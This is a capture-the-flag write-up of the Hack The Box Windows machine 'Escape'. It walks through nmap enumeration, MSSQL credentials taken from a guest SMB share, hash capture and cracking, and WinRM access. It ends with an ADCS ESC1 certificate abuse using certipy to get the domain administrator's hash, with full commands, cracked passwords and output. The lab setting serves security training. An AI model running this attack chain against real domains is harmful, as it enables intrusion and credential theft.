HTB - Escape

Descripiton

Escape is a Medium difficulty Windows Active Directory machine that starts with an SMB share that guest authenticated users can download a sensitive PDF file. Inside the PDF file temporary credentials are available for accessing an MSSQL service running on the machine. An attacker is able to force the MSSQL service to authenticate to his machine and capture the hash. It turns out that the service is running under a user account and the hash is crackable. Having a valid set of credentials an attacker is able to get command execution on the machine using WinRM. Enumerating the machine, a log file reveals the credentials for the user ryan.cooper. Further enumeration of the machine, reveals that a Certificate Authority is present and one certificate template is vulnerable to the ESC1 attack, meaning that users who are legible to use this template can request certificates for any other user on the domain including Domain Administrators. Thus, by exploiting the ESC1 vulnerability, an attacker is able to obtain a valid certificate for the Administrator account and then use it to get the hash of the administrator user.

Enumeration

---

Nmap Scan

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $ nmap -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1433/tcp open  ms-sql-s
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman
9389/tcp open  adws

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/udp-scan

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $ nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-03 17:36:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-03T17:33:04
|_Not valid after:  2054-11-03T17:33:04
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Summary

* Open ports: 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - KERBEROS- RPC - SMB - LDAP - LDAPS - MSSQL - winRM - NTP
* Important notes: DNS:dc.sequel.htb - Domain: sequel.htb - Microsoft SQL Server 2019

hosts file

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $sudo sh -c "echo  '$ip dc dc.sequel.htb sequel.htb ' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $tail -n1 /etc/hosts
10.10.11.202 dc dc.sequel.htb sequel.htb

Kerberos Enumeration

I started my enumeration process by bruting kerberos since I need domain account to attack the box as no web server here but with no luck

kerbrute userenum -d sequel.htb --dc $ip jsmith.txt -o users

SMB & RPC Enumeration

I moved then to smb and rpc services looking for misconfiguration in shared folder permissions or rpc. I found I had READ access on the Public share and no access to RPC.

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
result was NT_STATUS_ACCESS_DENIED

I connected to the share and download a pdf file from it

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $impacket-smbclient sequel.htb/guest:''@dc

# shares
ADMIN$
C$
IPC$
NETLOGON
Public
SYSVOL
# use Public
# ls
drw-rw-rw-          0  Sat Nov 19 06:51:25 2022 .
drw-rw-rw-          0  Sat Nov 19 06:51:25 2022 ..
-rw-rw-rw-      49551  Sat Nov 19 06:51:25 2022 SQL Server Procedures.pdf
# get SQL Server Procedures.pdf

After opening the file, I noticed there are credentials at the end of it.

Foothold

---

PublicUser:GuestUserCantWrite1

I can access the database with these creds :))

When I deal with mssql, I perform checklist for possible attack paths, So I will create one

• Check for admin Access

• Check the databases for juicy info and secrets

• Check the possibility capture the mssql service account

• Check for impersonate other users

• Check for trustworthy database

• Check for Linked Server

• Check for Read or Write Access to the file system

• Check for executing command with xp_cmdshell

SQL (PublicUser  guest@master)> enum_db
name     is_trustworthy_on   
------   -----------------   
master                   0   
tempdb                   0   
model                    0   
msdb                     1   

SQL (PublicUser  guest@master)> enum_links
SRV_NAME     SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE   SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
----------   ----------------   -----------   --------------   ------------------   ------------   -------   
DC\SQLMOCK   SQLNCLI            SQL Server    DC\SQLMOCK       NULL                 NULL           NULL

SQL (PublicUser  guest@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee   grantor   
----------   --------   ---------------   ----------   -------   ------- 

SQL (PublicUser  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID   
------------------   --------   ---------   ---------   -------------   ----------   -----   
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'   
guest                public     NULL        NULL        guest           b'2         '   b'00'   
INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL   
sys                  public     NULL        NULL        NULL            b'4         '    NULL

Nothing is interesting till now but I got the hash of service account using local smb server.

The hash is cracked successfully

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $hashcat -m 5600 sql.hash /usr/share/wordlists/rockyou.txt 


..snip..
SQL_SVC::sequel:aaaaaaaaaaaaaaaa:afe08a49ef50bb618c7ebe172f3fc719:01010000000000008014fb68d92ddb01dff7d14561d219d700000000010010006a006c00720069006500550047005300030010006a006c007200690065005500470053000200100071004c0043004300780042007a0049000400100071004c0043004300780042007a004900070008008014fb68d92ddb01060004000200000008003000300000000000000000000000003000008ab9cecef8fc5bd1bf12dec37969b9f951514a8bb2b1613c8c474ba64776dcc40a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310032000000000000000000:REGGIE1234ronnie

Session..........: hashcat
Status...........: Cracked

I can also access the database with the new account.

The account don't have special permissions So I will move to winRM

SQL (sequel\sql_svc  guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin')
    
-   
0  

Lateral Movement

---

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $evil-winrm -i dc -u sql_svc -p REGGIE1234ronnie

*Evil-WinRM* PS C:\Users\sql_svc\Documents>

Under C:\SQLServer\Logs, there is a .bak file containing logs info of MSSQL instance. What is interesting is that I find Ruan.Cooper trying to login and failed. Maybe I can use this string as a password NuclearMosquito3

*Evil-WinRM* PS C:\SQLServer\Logs> dir

    Directory: C:\SQLServer\Logs

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK

*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK

..snip..
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
..snip..

And the password is correct :))

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $nxc ldap dc -u Ryan.Cooper -p NuclearMosquito3

LDAPS  10.10.11.202   636  DC   [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 

Privilege Escalation

---

I accessed the machine as Ryan and found he is a member of Certificate Service DCOM Access

I need to enumerate the PKI of the domain since this group exists. A CA is found in the domain with name of sequel-DC-CA

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $nxc ldap dc -u Ryan.Cooper -p NuclearMosquito3 -M adcs

LDAPS       10.10.11.202    636    DC               [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 
ADCS        10.10.11.202    389    DC               [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.11.202    389    DC               Found PKI Enrollment Server: dc.sequel.htb
ADCS        10.10.11.202    389    DC               Found CN: sequel-DC-CA

Then, I looked at vulnerable template for possible Escalation paths (ESC)

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $certipy find -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -vulnerable -stdout

    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True  

..snip..

    [!] Vulnerabilities
      ESC1                              : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

The template UserAuthentication is vulnerable to ESC1 which means I can request certificate with alternative principal name (upn)

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $certipy req -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -ca sequel-DC-CA -template UserAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 15
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $certipy auth -pfx administrator.pfx -dc-ip 10.10.11.202
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5xxxxxxxxxxxxx

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $evil-winrm -i dc -u administrator -H a52f78e4c751e5f5exxxxxxxxxxxx

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
6ecb67c8db147ac353xxxxxxxxxxxxxxx

Root Flag: 6ecb67c8db147ac353xxxxxxxxxxxxxxx